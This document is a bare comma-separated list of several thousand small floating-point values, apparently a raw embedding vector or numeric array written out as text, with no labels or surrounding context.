-0.018671773374080658, -0.003965811338275671, -0.02634935826063156, -0.028875621035695076, -0.0032478016801178455, 0.0162725280970335, -0.017458036541938782, 0.04496467858552933, 0.0103308679535985, 0.0015171697596088052, 0.016583018004894257, 0.01438135839998722, -0.022355319932103157, 0.004251603502780199, 0.004974905401468277, -0.01607494242489338, -0.00941350869834423, 0.019462112337350845, 0.00627684872597456, -0.015905585139989853, 0.0067672827281057835, 0.0007374150445684791, 0.009985093958675861, 0.00891249068081379, -0.012574867345392704, 0.017556829378008842, -0.0010020376648753881, -0.020534716546535492, 0.0007038962212391198, -0.0027062075678259134, 0.016286641359329224, -0.007868112996220589, 0.04135169833898544, 0.014261395670473576, 0.0022457640152424574, -0.01872822642326355, -0.00019251296180300415, 0.010387320071458817, -0.019447999075055122, -0.005327735561877489, 0.0067390562035143375, 0.0022598772775381804, 0.010782490484416485, -0.023258564993739128, 0.0009085377096198499, -0.005158377345651388, -0.0065979245118796825, 0.0031648867297917604, 0.003835264127701521, -0.029863545671105385, -0.018742339685559273, 0.03485962003469467, 0.007726980838924646, -0.020605282858014107, -0.0042233774438500404, 0.029157886281609535, 0.005154849030077457, 0.011904490180313587, 0.01933509297668934, -0.0005433584447018802, -0.00024080659204628319, 0.03229101747274399, 0.012751282192766666, -0.01806490495800972, 0.014275508932769299, 0.02241177298128605, -0.017091093584895134, -0.01655479148030281, 0.02156498096883297, 0.025177961215376854, 0.010493169538676739, -0.004639716818928719, -0.0035212452057749033, -0.018643546849489212, -0.003380113048478961, 0.007508226204663515, -0.014720074832439423, -0.0072400751523673534, 0.012899471446871758, 0.003990509081631899, 0.0020552356727421284, -0.009378226473927498, 0.007959849201142788, 0.0026885659899562597, -0.02989177219569683, -0.015284603461623192, 0.017726188525557518, -0.011311735957860947, -0.042819470167160034, 0.011897433549165726, 0.04073071479797363, -0.00003806706808973104, 0.010464943014085293, -0.02426060289144516, -0.029496602714061737, -0.0014342546928673983, 0.0010417310986667871, -0.010796603746712208, -0.013012376613914967, -0.01929275318980217, 0.017754415050148964, 0.0016433065757155418, 0.041633959859609604, -0.013118226081132889, -0.018855243921279907, -0.012377282604575157, -0.00037025116034783423, -0.03692014887928963, 0.01778264157474041, -0.0019917264580726624, 0.0018470659852027893, -0.0022369432263076305, 0.01726045273244381, -0.004353924188762903, -0.008312678895890713, -0.00009289356967201456, -0.002804999938234687, 0.023526716977357864, 0.013421660289168358, 0.008235055953264236, 0.0016591838793829083, 0.0318676233291626, 0.011629282496869564, -0.015496301464736462, 0.006400339305400848, 0.007945735938847065, 0.002782065887004137, -0.011205886490643024, -0.007430603727698326, -0.00679903756827116, -0.0091947540640831, -0.011008301749825478, 0.02208716981112957, 0.009018339216709137, -0.039799243211746216, 0.012320829555392265, 0.009117132052779198, -0.007063660304993391, -0.013732150197029114, -0.0007868112879805267, -0.02005486749112606, 0.0015771508915349841, 0.0023022168315947056, -0.05018656328320503, 0.004265716765075922, -0.025714263319969177, 0.0061357165686786175, 0.091001957654953, -0.0020605281461030245, -0.016117282211780548, -0.00955464132130146, -0.0032478016801178455, -0.009618151001632214, -0.001409556600265205, 0.0036941319704055786, 0.01134701818227768, -0.019222188740968704, 0.020125433802604675, -0.0031789999920874834, 0.006093377247452736, 0.016568904742598534, 0.02114158496260643, -0.0020887546706944704, 0.028169961646199226, -0.006816679146140814, 0.025375546887516975, -0.009046565741300583, -0.010323811322450638, 0.02444407530128956, -0.0024962734896689653, -0.011523433960974216, 0.01437430176883936, -0.01364041492342949, -0.0007294763927347958, 0.005320678930729628, -0.034916073083877563, -0.0012296132044866681, 0.0005204245098866522, 0.001138759427703917, 0.00938528310507536, -0.0021434433292597532, 0.006354471668601036, 0.0031860563904047012, 0.0010099763749167323, -0.032545056194067, -0.00851026363670826, -0.0010011555859819055, 0.003473613178357482, 0.01203856524080038, 0.018897583708167076, -0.01127645280212164, 0.012715999968349934, -0.02327267825603485, 0.025742489844560623, -0.0027855942025780678, 0.0014369009295478463, -0.00796690583229065, -0.002355141332373023, -0.019546791911125183, 0.000990570755675435, 0.00817860383540392, 0.004572679288685322, 0.002423943253234029, 0.02898852713406086, 0.0020111319608986378, 0.007487056311219931, -0.010112113319337368, -0.0000826945761218667, 0.00627684872597456, 0.001386622549034655, 0.0026179999113082886, 0.022383546456694603, 0.013774489983916283, 0.03220633789896965, -0.015637433156371117, -0.005338320508599281, 0.039912149310112, 0.005998113192617893, 0.026829207316040993, -0.005475924350321293, 0.0033607075456529856, -0.00808686763048172, 0.014176716096699238, -0.0003173266304656863, 0.037343546748161316, -0.015072905458509922, -0.012412565760314465, 0.01985728181898594, 0.013753320090472698, -0.014720074832439423, 0.014762414619326591, -0.003163122572004795, 0.013986187987029552, -0.004269245080649853, -0.02733728289604187, 0.009251207113265991, 0.007550565991550684, -0.02445818856358528, -0.007165980990976095, -0.010225018486380577, -0.018008451908826828, 0.014155547134578228, 0.020845206454396248, 0.01569388620555401, 0.0018752923933789134, -0.003339537652209401, -0.011664565652608871, -0.010098000057041645, -0.0204782634973526, -0.00855966005474329, -0.00010116303019458428, -0.008792527951300144, 0.030625659972429276, 0.0006637617480009794, 0.017810868099331856, 0.015453961677849293, -0.0052501130849123, -0.07062248885631561, 0.00950524490326643, 0.0097169429063797, -0.03152890503406525, -0.017726188525557518, -0.003561820602044463, -0.007973962463438511, -0.008961886167526245, -0.0048126038163900375, -0.04431546851992607, -0.010090943425893784, -0.03107728250324726, 0.021296828985214233, 0.014042641036212444, 0.013520452193915844, -0.005214829929172993, -0.0009535235585644841, 0.005842867773026228, 0.006167471408843994, 0.0007268301560543478, 0.014303735457360744, 0.002206952776759863, -0.0024927451740950346, -0.039883922785520554, -0.0045867920853197575, -0.0016424244968220592, -0.00992864090949297, -0.01730279251933098, -0.024994490668177605, 0.015962036326527596, -0.022016603499650955, 0.01915162242949009, 0.0162725280970335, 0.0016353678656741977, 0.016230188310146332, 0.00122696696780622, -0.007479999680072069, 0.011636339128017426, 0.02558724395930767, 0.004329226445406675, -0.011763358488678932, -0.007917509414255619, 0.002565075410529971, 0.011946829967200756, 0.016046715900301933, 0.0021434433292597532, 0.026758641004562378, 0.00756467878818512, -0.007762263994663954, -0.014303735457360744, 0.014550716616213322, 0.019589131698012352, -0.000724624958820641, 0.006026339251548052, 0.014409583993256092, 0.03528301790356636, 0.02709735743701458, 0.011932716704905033, -0.019278641790151596, -0.010443773120641708, 0.003374820575118065, 0.01061313133686781, -0.022919848561286926, -0.00941350869834423, 0.0483236201107502, 0.02667396143078804, -0.01323818787932396, -0.0029655375983566046, 0.013231131248176098, -0.005789943039417267, -0.005514735821634531, 0.02824052795767784, 0.004297471605241299, 0.01858709380030632, 0.029496602714061737, -0.03277086839079857, -0.0016644763527438045, 0.004936094395816326, -0.017768528312444687, -0.012977094389498234, -0.01222909428179264, 0.0518236979842186, -0.0039728679694235325, -0.0462348647415638, -0.02766188606619835, -0.012779508717358112, 0.013294640928506851, -0.004061075393110514, 0.009935697540640831, -0.006742584519088268, 0.007853999733924866, -0.0036094526294618845, -0.0008154787356033921, 0.009568754583597183, -0.011692792177200317, -0.011149433441460133, 0.01560920663177967, 0.022778715938329697, 0.004502112977206707, -0.009999207220971584, 0.008362075313925743, -0.01854475401341915, -0.013887396082282066, 0.018615320324897766, -0.016018489375710487, -0.0036694337613880634, -0.006650848779827356, 0.008206830359995365, 0.011057698167860508, 0.011325848288834095, -0.0026885659899562597, -0.024599319323897362, 0.008990112692117691, 0.017006414011120796, 0.0009076556307263672, -0.0020746414083987474, 0.020689962431788445, 0.0018629432888701558, 0.011170603334903717, 0.007360037416219711, 0.016103168949484825, 0.023808980360627174, 0.02955305576324463, -0.009752226062119007, 0.017133433371782303, -0.002787358360365033, -0.0057723019272089005, -0.037343546748161316, 0.01045082975178957, -0.007374150678515434, 0.0025703678838908672, -0.0038740753661841154, -0.01255369745194912, -0.008333848789334297, -0.009286490269005299, -0.0003100495086982846, 0.016103168949484825, -0.00929354690015316, -0.002355141332373023, 0.017486263066530228, -0.026758641004562378, -0.025601357221603394, 0.01810724474489689, 0.00456209434196353, -0.016907623037695885, 0.017048753798007965, -0.018234264105558395, 0.015171697363257408, 0.02313154563307762, -0.035593509674072266, 0.009695773012936115, -0.006859018467366695, -0.030371621251106262, 0.008707848377525806, -0.020788753405213356, 0.01919396221637726, -0.0016177264042198658, 0.00019857723964378238, 0.007705810945481062, 0.023540830239653587, -0.011805697344243526, 0.020746413618326187, -0.0038493771571666002, -0.0025633112527430058, -0.019236302003264427, -0.004844358190894127, 0.01248313207179308, -0.015072905458509922, -0.03768226131796837, 0.002429235726594925, -0.0015639197081327438, 0.03296845033764839, -0.010507282800972462, -0.006121603772044182, -0.018615320324897766, 0.011826867237687111, -0.02188958413898945, -0.022595245391130447, 0.024909811094403267, -0.01270188670605421, -0.004794962238520384, -0.007360037416219711, -0.004121056292206049, -0.008968942798674107, 0.0024645188823342323, -0.003584754653275013, -0.022962188348174095, 0.015524527989327908, 0.01750037632882595, -0.009251207113265991, 0.012927697971463203, 0.02444407530128956, 0.0044174338690936565, 0.025474339723587036, 0.0006941933534108102, 0.009907471016049385, 0.002415122464299202, -0.041267018765211105, -0.014077924191951752, -0.013555735349655151, -0.0018347168806940317, -0.005761716980487108, -0.009498188272118568, -0.012207924388349056, 0.012631320394575596, -0.020111320540308952, 0.010380263440310955, 0.022665809839963913, 0.01806490495800972, 0.0008295919396914542, -0.018615320324897766, 0.007331810891628265, -0.04180331900715828, -0.011100037023425102, -0.017133433371782303, 0.019786715507507324, 0.023808980360627174, -0.008714905008673668, -0.008757244795560837, -0.0318676233291626, 0.00981573574244976, 0.00818566046655178, 0.0032848489936441183, 0.017288679257035255, 0.009808679111301899, 0.004068132024258375, 0.012264377437531948, -0.008489093743264675, -0.004484471399337053, -0.007155396044254303, -0.02124037593603134, 0.0283675454556942, -0.01186920702457428, 0.023569056764245033, -0.014451923780143261, -0.006562641356140375, -0.016681810840964317, -0.006199226249009371, -0.002379839541390538, -0.030004678294062614, -0.013767433352768421, 0.007180094253271818, -0.00292672635987401, 0.03367411345243454, 0.019081056118011475, 0.027125583961606026, 0.022482339292764664, -0.009314716793596745, 0.03787984699010849, -0.008545546792447567, 0.000848556577693671, 0.00335894338786602, -0.03982746973633766, -0.023230338469147682, -0.010831886902451515, 0.006728471256792545, 0.011481094174087048, 0.03821856528520584, -0.00019107959815301, 0.028776830062270164, -0.019236302003264427, 0.00818566046655178, -0.015383395366370678, -0.007113056257367134, -0.023964226245880127, 0.006481490563601255, 0.02804294228553772, -0.007508226204663515, 0.004579735919833183, -0.024048905819654465, 0.017373358830809593, 0.02071818895637989, 0.016328981146216393, -0.010161508806049824, -0.0018699999200180173, 0.02506505511701107, -0.030569206923246384, 0.0010020376648753881, -0.023653734475374222, 0.039912149310112, 0.008206830359995365, 0.004685584921389818, -0.0022157735656946898, 0.02188958413898945, 0.025784829631447792, -0.021310942247509956, 0.0006236273329705, -0.0008062169654294848, -0.00640739593654871, -0.006329773459583521, -0.006414452567696571, -0.018643546849489212, 0.0062168678268790245, 0.010161508806049824, 0.021691998466849327, 0.033504754304885864, -0.0027697167824953794, 0.005525320768356323, 0.03152890503406525, -0.01697818748652935, 0.0005407122662290931, 0.01683705672621727, -0.03387169539928436, -0.015595094300806522, 0.0022739905398339033, -0.02709735743701458, 0.00572290550917387, 0.004893754608929157, 0.027393734082579613, -0.006485018879175186, 0.021677885204553604, 0.021268602460622787, -0.04437192156910896, -0.029524829238653183, -0.004833773244172335, 0.0006915471749380231, 0.018798792734742165, -0.005800527986139059, -0.010020377114415169, 0.010789547115564346, 0.008100980892777443, 0.018050791695713997, -0.007656414993107319, -0.01735924556851387, 0.004883169662207365, -0.031105509027838707, -0.018177811056375504, 0.01109298039227724, -0.0020252452231943607, 0.00357064139097929, 0.0006968395900912583, -0.008044527843594551, 0.004996075294911861, 0.0014042641269043088, -0.006590867880731821, -0.011883320286870003, -0.015058792196214199, -0.0024662830401211977, -0.022806942462921143, -0.013591018505394459, 0.016300754621624947, 0.020167773589491844, 0.0051901317201554775, -0.004491528030484915, -0.004166924394667149, -0.004018735606223345, -0.0021399150136858225, 0.005588829983025789, -0.0064391507767140865, -0.0007038962212391198, 0.020083094015717506, 0.006495603360235691, 0.01673826389014721, 0.0032654432579874992, 0.018149584531784058, 0.0065979245118796825, 0.0017923773266375065, 0.0013830943498760462, -0.003644735785201192, -0.02983531914651394, 0.014346075244247913, 0.030004678294062614, -0.016893509775400162, 0.00706013198941946, -0.003909358289092779, -0.0026127074379473925, -0.023893659934401512, -0.014522490091621876, 0.01317467913031578, 0.00004418646858539432, -0.00679903756827116, -0.0007330047083087265, -0.0028491036500781775, -0.007215376943349838, -0.01759916916489601, 0.034210413694381714, -0.00021335200290195644, -0.007331810891628265, -0.021113358438014984, 0.014324905350804329, 0.0022651697508990765, -0.005976943299174309, -0.00003520032259984873, -0.0037788113113492727, -0.0008547311299480498, -0.00042295517050661147, -0.0027661886997520924, 0.04403320699930191, 0.00464677345007658, -0.00799513142555952, -0.0042868866585195065, -0.009780452586710453, 0.006555584724992514, 0.0029037923086434603, -0.016484225168824196, -0.022439999505877495, -0.0010276178363710642, 0.005902848672121763, 0.02341381087899208, -0.001204033032990992, 0.008834867738187313, -0.014211999252438545, 0.0006059858133085072, -0.013365207239985466, 0.006594396196305752, 0.018671773374080658, -0.006460320670157671, -0.005398301873356104, -0.036863695830106735, -0.0075929053127765656, 0.0017412169836461544, 0.013866226188838482, -0.005437112879008055, -0.007028377149254084, -0.008573773317039013, 0.001759740523993969, 0.00370118860155344, 0.011255282908678055, -0.02019600011408329, 0.00296730175614357, 0.009731056168675423, 0.018474187701940536, -0.00580405630171299, -0.012518414296209812, 0.006029867567121983, 0.008616113103926182, 0.024669885635375977, -0.010881282389163971, 0.00022956012981012464, 0.0026356414891779423, -0.0021681415382772684, -0.02188958413898945, 0.01423316914588213, 0.0028738018590956926, 0.004985490348190069, 0.006234509404748678, -0.004883169662207365, -0.00735298078507185, 0.0025615470949560404, -0.021353282034397125, 0.011586942709982395, -0.010302641429007053, 0.004121056292206049, 0.006580282934010029, 0.009660489857196808, -0.0016362499445676804, 0.0017870848532766104, 0.014077924191951752, -0.016780603677034378, 0.0002652841794770211, -0.005490037612617016, 0.01635720767080784, 0.037625811994075775, 0.0062027545645833015, -0.007868112996220589, -0.002002311171963811, -0.0008481155382469296, 0.014720074832439423, 0.0094558484852314, 0.008997169323265553, 0.0007682876894250512, -0.011833923868834972, 0.010831886902451515, 0.008044527843594551, -0.023569056764245033, 0.0026374056469649076, 0.0026744527276605368, -0.008079810999333858, 0.01896815001964569, 0.0021434433292597532, 0.003750584786757827, -0.005539433564990759, -0.028551017865538597, -0.0009019221179187298, -0.013845056295394897, 0.002295160200446844, -0.009914527647197247, 0.013379320502281189, -0.01613139547407627, -0.012123244814574718, 0.006477962248027325, -0.0020534717477858067, -0.040928300470113754, -0.007642301730811596, -0.015665659680962563, -0.010048603639006615, 0.01673826389014721, -0.020647622644901276, -0.012066791765391827, 0.022355319932103157, -0.018516527488827705, 0.015524527989327908, 0.006463848985731602, 0.0019529149867594242, -0.0022193018812686205, 0.008623169735074043, 0.02975064143538475, 0.014346075244247913, -0.014564829878509045, -0.017062867060303688, -0.008383245207369328, -0.010471999645233154, 0.006118075456470251, 0.024006566032767296, 0.012779508717358112, -0.007642301730811596, 0.008093924261629581, 0.0066614337265491486, -0.010542565956711769, -0.01196799986064434, 0.02033713087439537, 0.002221066039055586, -0.008834867738187313, 0.01222909428179264, -0.0010320282308384776, 0.01002743374556303, 0.0250227153301239, -0.01459305640310049, 0.00559235829859972, 0.01824837736785412, 0.024048905819654465, -0.0031648867297917604, 0.0098863011226058, 0.005864037666469812, -0.018502414226531982, 0.04914218559861183, -0.01597614958882332, -0.024204149842262268, 0.001975849037989974, -0.029016753658652306, 0.00882075447589159, -0.020224226638674736, -0.007910452783107758, -0.00516896229237318, -0.003277792362496257, -0.00860905647277832, 0.027915922924876213, 0.007959849201142788, -0.000014926370567991398, -0.007176565937697887, -0.030484527349472046, -0.009801622480154037, 0.003881131997331977, -0.003602395998314023, 0.001147580100223422, -0.01480475440621376, 0.015778565779328346, 0.012835961766541004, -0.008757244795560837, -0.003134896047413349, 0.022312980145215988, 0.018290717154741287, -0.011191773228347301, -0.0013398726005107164, 0.008905434049665928, 0.007839886471629143, 0.002132858382537961, -0.0013389905216172338, 0.005486509297043085, -0.004674999974668026, -0.04109765961766243, 0.0003567995154298842, 0.021212149411439896, 0.0029373113065958023, 0.008383245207369328, -0.01127645280212164, -0.006139244884252548, -0.014268452301621437, -0.008623169735074043, -0.004392735660076141, -0.01597614958882332, 0.009321773424744606, 0.0076987543143332005, 0.021113358438014984, -0.020605282858014107, -0.024712225422263145, 0.007465886417776346, -0.03375879302620888, 0.010944792069494724, 0.006485018879175186, 0.01906694285571575, -0.006859018467366695, 0.024669885635375977, 0.0020040753297507763, -0.0054547544568777084, -0.03296845033764839, 0.004794962238520384, 0.01826249063014984, 0.01862943358719349, 0.026264678686857224, 0.01878467947244644, -0.005098395980894566, 0.015665659680962563, -0.007081301882863045, -0.002332207513973117, -0.00019383608014322817, 0.008496150374412537, -0.017514489591121674, -0.0011687499936670065, -0.021296828985214233, -0.004742037504911423, 0.003374820575118065, 0.002221066039055586, 0.007367094047367573, 0.014127320609986782, 0.010535509325563908, 0.0052042449824512005, 0.0024309998843818903, 0.012857131659984589, 0.020492376759648323, 0.002704443410038948, 0.010563735850155354, 0.008707848377525806, 0.0014192593516781926, -0.002628584858030081, 0.007804603315889835, 0.010944792069494724, -0.017570942640304565, 0.0159338116645813, -0.00409283023327589, 0.01397207472473383, -0.0189116969704628, 0.027464300394058228, 0.01390150934457779, -0.00002104576924466528, -0.019702037796378136, 0.005384188611060381, -0.01291358470916748, -0.01250430103391409, -0.015623319894075394, 0.029948225244879723, 0.009935697540640831, -0.002628584858030081, -0.0110224150121212, -0.01324524451047182, 0.005207773298025131, -0.007585848681628704, 0.001189919770695269, -0.012821848504245281, 0.01597614958882332, -0.0013716273242607713, 0.018431847915053368, 0.02454286627471447, 0.017048753798007965, -0.0040504904463887215, 0.006054565776139498, 0.0091947540640831, 0.014945886097848415, -0.005183075089007616, -0.014649508520960808, 0.01480475440621376, 0.009462905116379261, 0.009893357753753662, 0.024811018258333206, 0.007599961943924427, 0.00719067919999361, -0.0002186444471590221, -0.032940223813056946, -0.014388415031135082, -0.012638377025723457, -0.0019264527363702655, -0.01014033891260624, 0.017458036541938782, 0.003343065967783332, -0.007113056257367134, -0.014508376829326153, 0.00846792384982109, -0.013668641448020935, -0.011198829859495163, -0.004960792139172554, -0.02061939612030983, -0.01939154602587223, -0.009907471016049385, 0.018290717154741287, 0.012807735241949558, 0.015143470838665962, 0.0042233774438500404, 0.003732943208888173, 0.004664415027946234, -0.011572829447686672, -0.00735298078507185, -0.00559235829859972, 0.0089336596429348, -0.02832520753145218, -0.013351093977689743, -0.01665358431637287, -0.006178056355565786, 0.007734037470072508, -0.009357056580483913, -0.022002490237355232, -0.005500622559338808, -0.024952150881290436, -0.0026673960965126753, 0.01735924556851387, 0.018135471269488335, 0.00731769809499383, 0.0015639197081327438, 0.0197726022452116, 0.0028226415161043406, -0.015835018828511238, -0.01007683016359806, -0.00865139625966549, -0.018643546849489212, -0.029016753658652306, -0.016540678218007088, -0.0012710706796497107, -0.00920181069523096, 0.016851169988512993, 0.024345282465219498, -0.0008847216959111392, 0.0021963678300380707, 0.016145508736371994, -0.008065697737038136, -0.024147696793079376, -0.000523952825460583, 0.009822792373597622, 0.004809075500816107, -0.001637132023461163, -0.010909508913755417, 0.008129207417368889, -0.0035088961012661457, -0.01449426356703043, -0.0022757546976208687, -0.003436565864831209, -0.011001245118677616, -0.004159867763519287, -0.009752226062119007, 0.002656811149790883, -0.015722112730145454, 0.0009499952429905534, 0.012666603550314903, -0.013301697559654713, -0.007981018163263798, 0.019970187917351723, -0.010676641017198563, -0.01788143254816532, 0.015919698402285576, -0.009921584278345108, 0.00782577320933342, -0.012934754602611065, -0.005306565668433905, 0.00554296188056469, -0.010599018074572086, -0.013492225669324398, 0.020845206454396248, -0.016526564955711365, 0.007127169519662857, -0.021593207493424416, -0.0343233197927475, -0.0027626603841781616, -0.0011669858358800411, 0.004473886452615261, 0.014127320609986782, -0.025093281641602516, 0.005243056453764439, -0.02138150855898857, -0.03121841326355934, 0.011403471231460571, -0.011205886490643024, 0.014945886097848415, -0.018812905997037888, 0.03353298082947731, 0.027026791125535965, 0.0006284787668846548, -0.006700245197862387, -0.008044527843594551, -0.018939923495054245, -0.01045082975178957, -0.00894071627408266, 0.004233961924910545, 0.009025395847856998, -0.026984451338648796, -0.001896462170407176, -0.016865283250808716, 0.020139547064900398, 0.002351613249629736, -0.014261395670473576, 0.0034101037308573723, -0.012941811233758926, -0.004957263823598623, -0.0001550247543491423, -0.00834796205163002, -0.005987528245896101, 0.008552603423595428, 0.0159338116645813, 0.012073848396539688, 0.005458282772451639, -0.0019493867876008153, 0.011269396170973778, 0.004410377237945795, 0.009265320375561714, -0.010105056688189507, -0.00045867922017350793, 0.0015877358382567763, -0.00799513142555952, -0.0002692535344976932, 0.01796611212193966, -0.020068980753421783, -0.0017209291690960526, -0.011897433549165726, 0.0017676792340353131, 0.000771816004998982, -0.0009685188415460289, -0.00601575430482626, 0.03675078973174095, -0.006365056615322828, -0.011205886490643024, -0.018855243921279907, -0.026829207316040993, 0.0038493771571666002, 0.02001252770423889, 0.009399396367371082, -0.004636188503354788, 0.0110224150121212, 0.00005959522241028026, -0.0028455753345042467, 0.002842047018930316, -0.027323169633746147, 0.001734160352498293, -0.00236396212130785, -0.027591319754719734, 0.004590320400893688, 0.016540678218007088, 0.02180490456521511, -0.04843652620911598, 0.007797547150403261, -0.012377282604575157, -0.027972375974059105, -0.022256527096033096, -0.019941961392760277, 0.00007326739432755858, -0.012567810714244843, -0.0011661037569865584, -0.006506188306957483, -0.01512935757637024, 0.002286339644342661, 0.02128271572291851, -0.0017720895120874047, -0.002670924412086606, 0.013471055775880814, -0.011904490180313587, 0.00912418868392706, -0.009272377006709576, -0.008700791746377945, -0.006156886462122202, 0.02406301721930504, -0.010464943014085293, -0.012885358184576035, 0.030117584392428398, -0.024698112159967422, -0.011121206916868687, 0.007628188468515873, 0.011509320698678493, 0.026885660365223885, 0.01217969786375761, 0.018333056941628456, -0.015044678933918476, -0.007917509414255619, -0.013845056295394897, 0.008051584474742413, -0.01957501843571663, -0.021198036149144173, 0.004929037764668465, 0.01222203765064478, -0.020633509382605553, -0.006033395882695913, -0.01882701739668846, 0.0018347168806940317, -0.0018258962081745267, -0.003990509081631899, 0.015143470838665962, 0.005306565668433905, -0.034690264612436295, -0.005888735875487328, -0.016992300748825073, -0.004368037451058626, 0.004921981133520603, -0.005422999616712332, -0.001725339563563466, -0.006488547194749117, -0.0007559386431239545, -0.01631486788392067, 0.008686679415404797, -0.003454207442700863, 0.02516384795308113, -0.019941961392760277, 0.0013504575472325087, -0.009540528059005737, -0.012469018809497356, -0.01323818787932396, -0.014832980930805206, -0.020788753405213356, -0.009484075009822845, 0.0014845329569652677, -0.002852631965652108, -0.017726188525557518, -0.01868588663637638, 0.006022810935974121, -0.0020481792744249105, 0.006400339305400848, 0.007000150624662638, 0.016822943463921547, -0.005948716774582863, 0.011163546703755856, -0.006333301775157452, -0.025714263319969177, -0.005560603458434343, 0.012384339235723019, -0.010471999645233154, -0.013442830182611942, 0.00692958477884531, -0.0028349903877824545, 0.013485169038176537, 0.016328981146216393, -0.022905735298991203, 0.00839735846966505, -0.0009870424401015043, -0.024613432586193085, -0.010253245010972023, 0.019687924534082413, 0.019603244960308075, -0.0008878089138306677, -0.01106475479900837, -0.004911396186798811, 0.015397508628666401, -0.00718715088441968, -0.0011466980213299394, -0.0031613584142178297, 0.005680565722286701, 0.03282732143998146, -0.005352433770895004, -0.009949810802936554, -0.019843168556690216, 0.02478279173374176, 0.0003343065909575671, 0.0101473955437541, 0.007331810891628265, 0.01390150934457779, -0.002946132095530629, 0.010112113319337368, -0.014734188094735146, 0.006523829884827137, -0.013732150197029114, -0.02160732075572014, -0.0044950563460588455, -0.006940169725567102, 0.009427621960639954, 0.007656414993107319, -0.007409433834254742, -0.005264226347208023, -0.00005339313065633178, -0.00421984912827611, 0.012560754083096981, -0.013294640928506851, 0.03576286509633064, -0.005387716926634312, -0.012843018397688866, 0.014748301357030869, -0.026800980791449547, 0.024867471307516098, 0.011650452390313148, 0.022073056548833847, -0.0043398113921284676, -0.012447848916053772, 0.018220150843262672, -0.006777867674827576, -0.016780603677034378, -0.03404105454683304, 0.01054962258785963, -0.011269396170973778, -0.013068829663097858, -0.007783433888107538, -0.01123411301523447, 0.00843969825655222, -0.0019141037482768297, -0.012920641340315342, -0.010295584797859192, 0.005027830135077238, 0.008736074902117252, 0.014508376829326153, -0.015482188202440739, 0.005422999616712332, 0.002579188672825694, 0.0022087169345468283, -0.0058075846172869205, 0.006340358406305313, -0.022538792341947556, 0.02331501804292202, -0.014451923780143261, 0.010563735850155354, -0.017062867060303688, 0.004749094136059284, 0.020111320540308952, 0.01806490495800972, 0.03333539515733719, -0.020111320540308952, -0.003545943181961775, 0.024373508989810944, -0.02132505550980568, 0.00008280482870759442, -0.006283905357122421, 0.002303980989381671, -0.008362075313925743, 0.0076987543143332005, 0.0055112075060606, -0.008030414581298828, -0.00025205305428244174, -0.01428256556391716, 0.013104112818837166, -0.02085931971669197, -0.00908184889703989, -0.0178673192858696, 0.020450036972761154, -0.001423669746145606, -0.005775829777121544, -0.009759282693266869, -0.01054962258785963, 0.0001530400913907215, -0.004738509189337492, -0.015397508628666401, -0.01109298039227724, 0.0026885659899562597, 0.015115245245397091, 0.036637887358665466, 0.011763358488678932, -0.0055711884051561356, -0.008799584582448006, 0.003408339573070407, -0.022298866882920265, -0.005066641140729189, -0.010387320071458817, -0.01635720767080784, 0.0014704198110848665, 0.0076352450996637344, -0.007324754260480404, 0.004311584867537022, 0.01949033886194229, -0.01816369779407978, -0.011318791657686234, 0.002238707384094596, 0.008432641625404358, 0.0019952545408159494, -0.00985807552933693, -0.0028402828611433506, 0.003951698075979948, 0.014042641036212444, 0.01276539545506239, -0.012377282604575157, 0.021056905388832092, -0.00430452823638916, 0.002605650806799531, 0.00438567902892828, 0.013047659769654274, -0.01759916916489601, -0.0155809810385108, -0.007487056311219931, -0.011121206916868687, -0.009074792265892029, -0.019264528527855873, -0.000016731868527131155, -0.02828286774456501, -0.01118471659719944, -0.01281479187309742, 0.016060829162597656, -0.004410377237945795, 0.0236396212130785, -0.00567350909113884, -0.010105056688189507, -0.02492392435669899, 0.0060580940917134285, 0.002078169723972678, -0.006534414831548929, 0.004152811132371426, -0.006417980883270502, -0.001124646165408194, -0.0054265279322862625, -0.02402067929506302, -0.014790641143918037, -0.02028067782521248, 0.025149734690785408, -0.019038716331124306, 0.013957961462438107, -0.0026409339625388384, 0.02657516859471798, 0.01222909428179264, -0.013929735869169235, -0.01806490495800972, -0.012539584189653397, 0.025940075516700745, 0.021056905388832092, 0.0000070841683736944105, -0.028536904603242874, -0.001033792388625443, 0.0011978584807366133, 0.012871244922280312, 0.03059743344783783, 0.0053630187176167965, 0.00036120988079346716, -0.006393282674252987, -0.004025792237371206, -0.00614630151540041, -0.008898377418518066, -0.021579094231128693, -0.0005848160362802446, 0.005320678930729628, 0.0014818867202848196, -0.011946829967200756, -0.007726980838924646, 0.012278489768505096, -0.011742188595235348, -0.012617207132279873, -0.005941660143435001, -0.006051037460565567, 0.006950754672288895, 0.0016300753923133016, 0.003189584705978632, -0.024599319323897362, -0.01853064075112343, 0.02037947066128254, 0.031133735552430153, -0.0057723019272089005, 0.013576905243098736, 0.012426679022610188, -0.024373508989810944, 0.024288829416036606, 0.0068978299386799335, -0.00019560022337827832, 0.020972225815057755, -0.006213339511305094, -0.008369131945073605, 0.015425735153257847, -0.008263282477855682, 0.0005243938649073243, -0.012532527558505535, 0.024246489629149437, 0.013061773031949997, -0.008799584582448006, 0.000626273569650948, 0.010133282281458378, 0.01764150895178318, 0.02015366032719612, 0.0031472451519221067, -0.010203848592936993, -0.028649810701608658, 0.003122547175735235, 0.002902028150856495, -0.016540678218007088, 0.0004185448051430285, -0.005031358450651169, 0.013407547026872635, -0.01759916916489601, 0.00005113281076774001, 0.0038493771571666002, -0.020252451300621033, -0.010055660270154476, -0.01631486788392067, -0.0017147546168416739, -0.017429810017347336, 0.003662377130240202, 0.0013434009160846472, 0.009378226473927498, -0.0009588160319253802, 0.018008451908826828, 0.0017032877076417208, 0.02814173512160778, -0.013132339343428612, 0.0017976697999984026, 0.010373206809163094, -0.0029390754643827677, -0.008213886991143227, -0.0030025849118828773, -0.020873432978987694, -0.02037947066128254, 0.005818169564008713, -0.017613282427191734, -0.002508622594177723, -0.007832829840481281, 0.0026268207002431154, 0.00005871314715477638, 0.008009244687855244, 0.010098000057041645, 0.017712075263261795, 0.006866075098514557, 0.008926603943109512, 0.0020658206194639206, -0.00585345271974802, -0.0061251320876181126, -0.014480150304734707, 0.007151867728680372, -0.012447848916053772, -0.007479999680072069, -0.00438567902892828, 0.006421509198844433, 0.0029108489397913218, 0.009589924477040768, -0.0017685613129287958, -0.005482980981469154, 0.008665509521961212, -0.006774339359253645, 0.0038881886284798384, -0.0015533348778262734, 0.009822792373597622, 0.017472149804234505, -0.004375094082206488, 0.001654773484915495, -0.01744392327964306, -0.00516543397679925, -0.017669735476374626, 0.02516384795308113, -0.03517011180520058, 0.011876263655722141, -0.0033218960743397474, 0.02218596078455448, -0.01324524451047182, 0.01768384873867035, 0.0315006785094738, 0.0012913584941998124, 